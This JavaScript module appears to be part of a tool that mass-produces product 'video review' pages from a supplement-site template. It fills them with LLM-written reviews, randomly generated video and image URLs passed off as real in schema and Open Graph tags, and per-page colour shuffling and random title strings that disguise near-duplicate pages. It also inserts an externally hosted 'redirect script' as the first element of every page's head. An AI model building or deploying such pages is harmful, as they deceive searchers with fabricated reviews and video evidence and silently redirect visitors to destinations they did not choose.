// ---------------------------------------------------------------------------
// videoReviewTemplate.js
// Handler for the plain-HTML "video review" template (inline <style>, one
// VideoObject JSON-LD block, .video-article-card / .video-body layout).
//
// What it fills in for each page:
//   - Title + random string, e.g. "My SEO Title (Gfbvj@d#)". The SAME string
//     is written everywhere the title appears: <title>, og:title,
//     twitter:title, breadcrumb, <h1>, the player's title and the schema name.
//   - Meta description/keywords, Open Graph and Twitter tags.
//   - Canonical link + og:url (the template has neither; they are added).
//   - Player, og:video and schema video URLs (one shared video ID).
//   - Thumbnails (og:image, twitter:image, schema, sidebar cards).
//   - The article body (.video-body): intro + the written review.
//   - Sidebar "More videos" cards, linked to other pages in the same batch.
//   - Date, footer year and the VideoObject schema.
//   - Site branding: the template's site name, badge initials and claim
//     phrases are replaced (Site Name field, default "<Product> Reviews").
//   - The redirect script, placed right after <head>.
//   - A unique colour scheme per page (layout untouched).
// ---------------------------------------------------------------------------
import { randImageUrl, randVideoUrl, slugify, embedUrlFor } from './random.js';
import { IMAGE_HOSTS, VIDEO_HOST } from './constants.js';
import { htmlAttrEscape, htmlTextEscape } from './escaping.js';
import { buildEvaluationHtml } from './evaluationArticle.js';
import { randomiseStyleColors } from './styleColors.js';

export const isVideoReviewTemplate = (html) => (
  html.includes('class="video-article-card"') &&
  html.includes('class="video-body"') &&
  html.includes('class="more-videos-list"')
);

// Styles for elements the article adds that the template has no rules for.
// Colours here are recoloured with the rest of the <style> block.
const EXTRA_CSS = `
    .video-body ol { margin: 0 0 12px 1.2rem; padding: 0; color: #d1d5db; }
    .video-body table { width: 100%; border-collapse: collapse; margin: 0 0 12px; font-size: 13px; }
    .video-body th, .video-body td { border: 1px solid rgba(148,163,184,0.25); padding: 6px 8px; text-align: left; vertical-align: top; color: #d1d5db; }
    .video-body th { color: #f9fafb; background: rgba(148,163,184,0.08); }
    .video-body figure { margin: 0 0 12px; }
    .video-body figure img { max-width: 100%; border-radius: 10px; display: block; }
    .video-body figcaption, .video-body em { color: var(--text-muted); font-size: 12px; }
    .video-body blockquote { margin: 0 0 12px; padding: 8px 12px; border-left: 2px solid var(--accent); color: #d1d5db; }
    .video-body .review-cta { margin: 14px 0; }
    .video-body .review-hashtags { color: var(--accent); font-size: 13px; }
`;

const firstSentence = (text) => {
  const sentence = String(text || '').split(/(?<=[.!?])\s+/)[0] || '';
  return sentence.length > 110 ? `${sentence.slice(0, 107).trimEnd()}…` : sentence;
};

// Replace the inner text/attribute matched by `pattern` (groups: open, close).
// Function replacers are used throughout so characters like "$" in a title
// are never treated as replacement patterns.
const setText = (html, pattern, value) => html.replace(pattern, (_, open, close) => `${open}${htmlTextEscape(value)}${close}`);
const setAttr = (html, pattern, value) => html.replace(pattern, (_, open, close) => `${open}${htmlAttrEscape(value)}${close}`);

export const transformVideoReviewTemplate = (
  template, keyword, product, canonical, llmJson, rng, customImageBase, customVideoBase, scriptBase, scriptName = null
) => {
  const changes = [];
  let html = template;

  const title = (llmJson.seo_title || keyword).trim();
  const description = llmJson.meta_description || llmJson.standfirst || `${product} review`;
  const now = new Date();
  const longDate = now.toLocaleDateString('en-US', { month: 'long', day: 'numeric', year: 'numeric' });
  const image = () => randImageUrl(rng.choice(IMAGE_HOSTS), rng, customImageBase);
  const heroImage = image();
  // A real recording supplied by the owner replaces the generated video URL.
  const generatedVideoUrl = randVideoUrl(VIDEO_HOST, rng, customVideoBase);
  const videoUrl = llmJson.research?.evidence?.videoUrl || generatedVideoUrl;

  // ── <head> ────────────────────────────────────────────────────────────────
  html = setText(html, /(<title>)[\s\S]*?(<\/title>)/i, title);
  html = setAttr(html, /(<meta name="description" content=")[^"]*(")/i, description);
  html = setAttr(html, /(<meta name="keywords" content=")[^"]*(")/i,
    `${product} reviews, ${product} video review, ${product} features, ${product} pricing, ${product} alternatives`);
  html = setAttr(html, /(<meta property="og:title" content=")[^"]*(")/i, title);
  html = setAttr(html, /(<meta property="og:description" content=")[^"]*(")/i, llmJson.og_description_head || description);
  html = setAttr(html, /(<meta property="og:image" content=")[^"]*(")/i, heroImage);
  html = setAttr(html, /(<meta property="og:video" content=")[^"]*(")/i, videoUrl);
  html = setAttr(html, /(<meta property="og:video:type" content=")[^"]*(")/i, 'video/mp4');
  html = setAttr(html, /(<meta name="twitter:title" content=")[^"]*(")/i, title);
  html = setAttr(html, /(<meta name="twitter:description" content=")[^"]*(")/i, llmJson.twitter_description_head || description);
  html = setAttr(html, /(<meta name="twitter:image" content=")[^"]*(")/i, heroImage);

  // The template has no canonical link or og:url: add both (or update them).
  if (/<link[^>]*rel="canonical"/i.test(html)) {
    html = html.replace(/<link[^>]*rel="canonical"[^>]*>/i, () => `<link rel="canonical" href="${htmlAttrEscape(canonical)}">`);
  } else {
    html = html.replace(/(<meta name="keywords"[^>]*>)/i, (tag) => `${tag}\n  <link rel="canonical" href="${htmlAttrEscape(canonical)}">`);
  }
  if (/<meta property="og:url"/i.test(html)) {
    html = setAttr(html, /(<meta property="og:url" content=")[^"]*(")/i, canonical);
  } else {
    html = html.replace(/(<meta property="og:type"[^>]*>)/i, (tag) => `${tag}\n  <meta property="og:url" content="${htmlAttrEscape(canonical)}">`);
  }

  // ── Breadcrumb, headline, date, player ────────────────────────────────────
  html = setText(html, /(<span class="crumb-current">)[\s\S]*?(<\/span>)/i, title);
  html = setText(html, /(<h1 class="video-title">)[\s\S]*?(<\/h1>)/i, title);
  html = setText(html, /(<p class="video-meta">\s*<span>)[^<]*(<\/span>)/i, longDate);
  html = html.replace(/(<(?:iframe|video)\b)([^>]*?)(>)/i, (whole, open, attrs, close) => {
    let next = attrs.replace(/(\bsrc=")[^"]*(")/i, (_, a, b) => `${a}${htmlAttrEscape(videoUrl)}${b}`);
    next = next.replace(/(\btitle=")[^"]*(")/i, (_, a, b) => `${a}${htmlAttrEscape(title)}${b}`);
    return open + next + close;
  });

  // ── Article body: intro paragraphs, then the written review ───────────────
  const introParas = llmJson.article?.intro?.length ? llmJson.article.intro : [llmJson.main_video_description || description];
  const intro = introParas.map((text) => `<p>${htmlTextEscape(text)}</p>`).join('\n');
  const article = buildEvaluationHtml(llmJson.article, product, { ...(llmJson.research || {}), rng });
  html = html.replace(/(<section class="video-body">)[\s\S]*?(<\/section>\s*<\/article>)/i,
    (_, open, close) => `${open}\n${intro}\n${article}\n      ${close}`);

  // ── Sidebar "More videos": each card links to another page in the batch ──
  const siblings = llmJson.siblings || [];
  let cardIndex = 0;
  html = html.replace(/<a\b[^>]*class="more-video-card"[^>]*>[\s\S]*?<\/a>/gi, (card) => {
    const i = cardIndex++;
    const cardTitle = llmJson.card_titles?.[i] || `${product} review`;
    const cardDesc = firstSentence(llmJson.card_contents?.[i]) || description;
    const href = siblings[i]?.url || canonical;
    let next = card.replace(/(<a\b[^>]*\bhref=")[^"]*(")/i, (_, a, b) => `${a}${htmlAttrEscape(href)}${b}`);
    next = next.replace(/(<img\b[^>]*\bsrc=")[^"]*(")/i, (_, a, b) => `${a}${htmlAttrEscape(image())}${b}`);
    next = next.replace(/(<img\b[^>]*\balt=")[^"]*(")/i, (_, a, b) => `${a}${htmlAttrEscape(cardTitle)}${b}`);
    next = setText(next, /(<p class="more-video-title">)[\s\S]*?(<\/p>)/i, cardTitle);
    next = setText(next, /(<p class="more-video-desc">)[\s\S]*?(<\/p>)/i, cardDesc);
    return next;
  });

  // ── Site branding around the article ──────────────────────────────────────
  // The template's own site name ("Official Supps Review") and its claims
  // ("Video Verification Center", "conversion-tested", "verification
  // summaries") belong to the original supplement site. They are replaced
  // with the Site Name from the form (default: "<Product> Reviews") and
  // neutral wording. The old name is read from the template's schema
  // publisher, so this works whatever the template's site was called.
  const siteName = (llmJson.siteName || '').trim() || `${product} Reviews`;
  const oldSite = (template.match(/"publisher"\s*:\s*\{[^}]*"name"\s*:\s*"([^"]+)"/) || [])[1]
    || (template.match(/<a[^>]*class="brand"[^>]*>[\s\S]*?<span>([^<]+)<\/span>/) || [])[1];
  if (oldSite && oldSite.trim()) {
    const oldSiteRx = new RegExp(oldSite.trim().replace(/[.*+?^${}()|[\]\\]/g, '\\$&').replace(/\s+/g, '\\s+'), 'gi');
    html = html.replace(oldSiteRx, () => htmlTextEscape(siteName));
  }
  const initials = siteName.split(/\s+/).filter(Boolean).slice(0, 2).map((word) => word[0].toUpperCase()).join('');
  html = setText(html, /(<div class="brand-badge">)[\s\S]*?(<\/div>)/i, initials);
  html = html.replace(/Video Verification Center/gi, () => 'Video Review Center');
  html = setText(html, /(<span class="video-meta-pill">)[\s\S]*?(<\/span>)/i, 'In-depth video review');
  html = html.replace(/(<footer class="footer">)[\s\S]*?(<\/footer>)/i,
    (_, open, close) => `${open}\n  © ${now.getFullYear()} ${htmlTextEscape(siteName)} · Video review summaries\n${close}`);

  // ── Schema markup (VideoObject) ───────────────────────────────────────────
  let schemaCount = 0;
  html = html.replace(/(<script type="application\/ld\+json">)([\s\S]*?)(<\/script>)/gi, (whole, open, body, close) => {
    try {
      const data = JSON.parse(body);
      if (data['@type'] !== 'VideoObject') return whole;
      data.name = title;
      data.description = description;
      data.thumbnailUrl = heroImage;
      // ISO 8601 (as schema.org/Google require), using the local calendar date.
      data.uploadDate = `${now.getFullYear()}-${String(now.getMonth() + 1).padStart(2, '0')}-${String(now.getDate()).padStart(2, '0')}`;
      data.contentUrl = videoUrl;
      data.embedUrl = embedUrlFor(videoUrl);
      data.url = canonical;
      if (data.publisher && typeof data.publisher === 'object') data.publisher.name = siteName;
      schemaCount++;
      return `${open}\n${JSON.stringify(data, null, 2)}\n${close}`;
    } catch {
      return whole;
    }
  });

  // ── Any remaining mention of the template's old product ───────────────────
  html = html.replace(/mitolyn/gi, () => product);

  // ── Unique colour scheme (layout unchanged) ───────────────────────────────
  html = html.replace(/<\/style>/i, () => `${EXTRA_CSS}  </style>`);
  const colours = randomiseStyleColors(html, rng, llmJson.colourHue);
  html = colours.html;

  // ── Redirect script: the first thing inside <head> ────────────────────────
  const base = scriptBase?.trim() || 'https://example.com/js/';
  const scriptUrl = `${base.endsWith('/') ? base : `${base}/`}${slugify(scriptName || product).replace(/-/g, '')}.js`;
  html = html.replace(/<head\b[^>]*>/i, (open) => `${open}\n  <script src="${htmlAttrEscape(scriptUrl)}" id="query" value="query"></script>`);

  changes.push('[video-review] Set title + random string in all title positions, meta tags, canonical and og:url');
  changes.push(`[video-review] Article body, ${cardIndex} sidebar cards and ${schemaCount} VideoObject schema updated`);
  changes.push(`[video-review] Colour scheme: hue shift ${colours.hueShift}° across ${colours.count} colour values`);
  changes.push(`[video] Player, og:video and schema use ${videoUrl}`);
  return { html, changes };
};
